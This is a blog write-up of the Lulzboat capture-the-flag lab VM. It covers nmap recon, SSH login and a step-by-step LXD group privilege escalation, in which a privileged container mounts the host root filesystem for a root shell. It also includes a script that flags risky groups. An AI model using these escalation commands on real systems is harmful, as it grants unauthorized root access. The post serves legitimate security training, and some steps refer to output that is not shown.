Setting sail on the Lulzboat capture the flag virtual machine

Posted in Security

Introduction

In between client projects, marketing, sales and looking after the lab I try to keep my technical skills sharp. One way I do this is to practise in the lab and on CTF arenas. I was cruising Twitter for threat intel and keeping in touch with the community when I saw that @ZachBarker1338 had submitted a VM to Hack The Box. Unfortunately, for a number of reasons it didn't meet the HTB review criteria, but that didn't stop the VM being published another way: @ZachBarker1338 collaborated with Secjuice (https://www.secjuice.com/) to release the Lulzboat CTF challenge VM.

Steps

  1. Download the virtual machine (you will need Oracle VirtualBox installed): https://www.secjuice.com/lulzboat-ctf-by-lulzseczombie/
  2. Configure networking (I had to use host-only networking to gain access to the VM; you may get access on a DHCP network, but I tried a few different DHCP-enabled segments with no joy)
  3. Load up a Kali instance (I set up a Kali VM in VirtualBox with dual NICs, one on the host-only network and one for internet access)
  4. Enumerate and hack your way in
  5. Use your LulzSec knowledge (or Wikipedia) to decipher the clues and finally reveal the flags

Breakdown (spoilers ahead)

Phase 1 Recon

Nmap the host:

nmap -F -T5 -Pn 192.168.56.103

The fast scan (-F covers the 100 most common ports, -Pn skips host discovery, which matters on a host-only network where the VM may not answer ping) shows that TCP 22 (SSH) and TCP 80 (HTTP) are open.

Phase 2 – Action on target (usermode)

Now that we have the password, we need to log in to the VM over SSH. As you can see from the text, we don't know the username. In traditional Hack The Box style the username is the creator of the virtual machine, in this case lulzseczombie.

A quick ssh lulzseczombie@192.168.56.103 gives us a user-mode shell:

So now we have confirmed user mode, we grab the user.txt flag!

A shrubbery... LulzSec... that can only mean the user flag is "Topiary" (https://www.merriam-webster.com/dictionary/topiary)

Next, it’s time to start hunting for a privilege escalation route.

In this instance it’s possible to locate the privilege escalation route just by running the id command:

However, that's retrospective. I personally found the route (this wasn't actually the planned priv esc route; there's a kernel vulnerability as well that can be exploited!) by uploading LinEnum.sh and executing it:

LXD looks interesting: it's a Linux container solution, and membership of the lxd group just screamed container breakout! Anyone in that group can talk to the LXD daemon, which runs as root, so they can create a privileged container with the host's root filesystem mounted inside it and read or write any host file as root.
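The point above about spotting the route from id output generalises: a handful of supplementary groups (lxd, docker, disk, sudo and so on) are each a root-equivalent route of their own. The following added example (mine, not from the original post or LinEnum) parses an id-style line and reports which of those groups the user holds. The list of risky groups is an assumption based on common Linux privesc checks, and the sample id line is constructed for the demo, not the real output from the box.

```shell
#!/bin/sh
# Added example: flag supplementary groups that commonly give a privilege
# escalation route, given the output of `id`.
#
# DANGEROUS_GROUPS is an assumption (typical Linux privesc checklist), not a
# list taken from the original post; extend it for your own environment.
DANGEROUS_GROUPS="lxd lxc docker disk sudo wheel adm shadow video"

# dangerous_groups ID_LINE
# Prints the risky groups found in ID_LINE, space separated, in the order
# they appear in the groups= field (empty line if none).
dangerous_groups() {
    id_line=$1
    # Keep only the groups= field; drop a trailing SELinux context if present.
    groups_field=${id_line##*groups=}
    groups_field=${groups_field%% *}
    # Split the field on commas into the positional parameters.
    old_ifs=$IFS
    IFS=','
    # shellcheck disable=SC2086  (unquoted on purpose: we want the split)
    set -- $groups_field
    IFS=$old_ifs
    found=""
    for entry in "$@"; do
        # Each entry looks like 108(lxd): extract the name between the parens.
        name=${entry#*(}
        name=${name%)}
        for g in $DANGEROUS_GROUPS; do
            if [ "$name" = "$g" ]; then
                found="$found $name"
            fi
        done
    done
    printf '%s\n' "${found# }"
}

# Constructed sample, modelled on what `id` prints for a user in the lxd
# group; this is NOT the real output from the Lulzboat box.
SAMPLE_ID='uid=1000(lulzseczombie) gid=1000(lulzseczombie) groups=1000(lulzseczombie),24(cdrom),30(dip),46(plugdev),108(lxd)'

# Run with --live to check the account you are currently logged in as.
if [ "${1:-}" = "--live" ]; then
    dangerous_groups "$(id)"
else
    dangerous_groups "$SAMPLE_ID"
fi
```

Drop the script onto a box after gaining a shell and run it with --live; a non-empty line is the cue to go and check what that group actually lets you do (for lxd, the container route below).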

Next, build an Alpine LXD image on the Kali VM and push it to the target. The build script needs root, so run it with sudo, and note that the clone creates a directory called lxd-alpine-builder, not alpine. The image filename below is the one the builder produced on the day; yours will carry a different date stamp.

git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
sudo ./build-alpine
scp alpine-v3.7-x86_64-20180621_0444.tar.gz lulzseczombie@192.168.56.103:

# ssh to the lulzboat VM as lulzseczombie, then:
mkdir lulz
mv alpine-v3.7-x86_64-20180621_0444.tar.gz lulz
cd lulz
# (if LXD has never been initialised on the box, run: lxd init --auto)
lxc image import alpine-v3.7-x86_64-20180621_0444.tar.gz --alias lulz

# list the image
lxc image list

# create the container in privileged mode: this removes the user namespace
# mapping, so root inside the container is root on the host's files
lxc init lulz ignite -c security.privileged=true

# mount the host filesystem into the container
lxc config device add ignite mydevice disk path=/mnt/root source=/ recursive=true

# the container must be started before exec will work
lxc start ignite

# execute a shell in the container
lxc exec ignite /bin/sh

# inside the container, navigate to the mounted host root and cat the flag
cd /mnt/root/root

Finally, we can see the flag is DES encrypted. The clue to the key is the LulzSec motto...

So we head over to a web-based DES decryption tool to start trying to decrypt (no, this wasn't a first hit IRL; I went all round the houses first, generating a wordlist and so on).

So, there we have it! From zero to hero with some simple enumeration and a bit of a history test thrown in. I really enjoyed this challenge: the LulzSec theme was fun and the route to pwn this box was at a reasonable level. Well done to @Cephurs and @knoself for getting first blood and second place!

If you are interested in expanding your skills, capture the flag competitions are a great way to hone them; there are some great platforms out there such as:

Thanks to @ZachBarker1338 for taking the time to put this together and @secjuice for publishing!
